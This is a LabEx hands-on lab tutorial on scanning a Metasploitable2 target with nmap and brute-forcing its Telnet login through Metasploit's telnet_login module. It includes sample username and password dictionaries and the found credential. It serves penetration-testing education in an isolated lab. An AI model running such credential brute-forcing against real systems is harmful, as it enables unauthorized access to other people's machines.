LabEx
Log InJoin Free

Exploit Telnet Service Vulnerability with Metasploit

NmapBeginner
Practice Now

Introduction

In this lab, we will learn how to exploit the Telnet service vulnerability and perform a penetration attack. The scenario involves using the Kali Linux machine as the attacking machine and the Metasploitable2 virtual machine as the target machine. The objective is to scan the target machine for vulnerabilities, identify the Telnet service vulnerability, and exploit it using the Metasploit Framework.

Start the Lab Environment

In this step, we will start the lab environment, which includes the Kali Linux container and the Metasploitable2 virtual machine.

  1. Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:
sudo virsh start Metasploitable2

Wait for the target machine to start, it may take 1-3 minutes.

  1. Test the connectivity to the target machine by pinging it:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

  1. Launch the Kali Linux container and enter the bash environment by running:
docker run -ti --network host b5b709a49cd5 bash
  1. Inside the Kali container, test the network connection to the target machine:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration testing.

Note: If you accidentally exit the current bash, the Kali container will automatically stop. You can execute docker run -ti --network host b5b709a49cd5 bash again on the host to start a new Kali container and enter bash to continue the experiment.

Perform Vulnerability Scanning

In this step, we will use Nmap to scan the target machine for open ports and services.

First, start the PostgreSQL database, as Metasploit requires it for data storage:

service postgresql start
msfdb init
cd ~
msfconsole

Within the Metasploit console, run the Nmap scan against the target machine:

nmap -sV -T4 192.168.122.102

The -sV option scans open ports and shows detailed port information, while -T4 sets the scan timing policy (0-5, higher values are faster but noisier).

Analyze the Scan Results

In this step, we will analyze the Nmap scan results to identify the vulnerable Telnet service.

The Nmap scan output shows that the Telnet service is running on port 23 with the banner "Linux telnetd". Let's search for the corresponding Metasploit module:

search scanner/telnet

Use the auxiliary/scanner/telnet/telnet_login module:

use auxiliary/scanner/telnet/telnet_login

Show the module options:

show options

The required option is RHOSTS, which specifies the target host(s).

Press Ctrl+D to quit the Metasploit console then start the inspection

Prepare the Username and Password Dictionary

In this step, we will prepare the username and password dictionary files for the login brute-force attack.

Open a new terminal and connect to the Kali container:

docker run -ti --network host b5b709a49cd5 bash

Create a file username.txt in / directory with the following usernames:

123456
admin
msfadmin
root
kali

Create another file password.txt in / directory with the following passwords:

abc123
1234
123456
root
msfadmin
admin
toor

These files will be used as the username and password dictionaries for the brute-force attack.

Configure the Metasploit Module

In this step, we will configure the Metasploit module with the target host, username dictionary, and password dictionary.

First of all, if you are not in the Metasploit console, you should start the Metasploit console:

cd ~
msfconsole

Use the auxiliary/scanner/telnet/telnet_login module:

use auxiliary/scanner/telnet/telnet_login

Set the target host:

set RHOSTS 192.168.122.102

Set the username dictionary file:

set USER_FILE /username.txt

Set the password dictionary file:

set PASS_FILE /password.txt

At last, run the exploit:

exploit

Metasploit will start trying different username and password combinations from the provided dictionaries. If a valid credential is found, it will be displayed in green.

In this case, the valid credential is msfadmin/msfadmin.

Press Ctrl+D to quit the Metasploit console then start the inspection

Summary

In this lab, we learned how to exploit the Telnet service vulnerability using the Metasploit Framework. We started by setting up the lab environment with the Kali Linux attacking machine and the Metasploitable2 target machine. We then performed vulnerability scanning using Nmap to identify the open Telnet service. Next, we prepared the username and password dictionaries and configured the Metasploit module with the target host and dictionary files. Finally, we executed the exploit and successfully brute-forced the Telnet login credentials.

This lab provided hands-on experience in penetration testing, vulnerability scanning, and utilizing the Metasploit Framework for exploiting vulnerabilities. It highlighted the importance of secure password practices and the potential risks of using weak or easily guessable credentials.

Related Nmap Courses
Nmap for Beginners

Nmap for Beginners

cybersecuritynmaplinux
Hands-On Network Scanning with Nmap on Linux

Hands-On Network Scanning with Nmap on Linux

cybersecuritynmaplinux
Nmap Scanning and Telnet Access

Nmap Scanning and Telnet Access

cybersecuritynmaplinux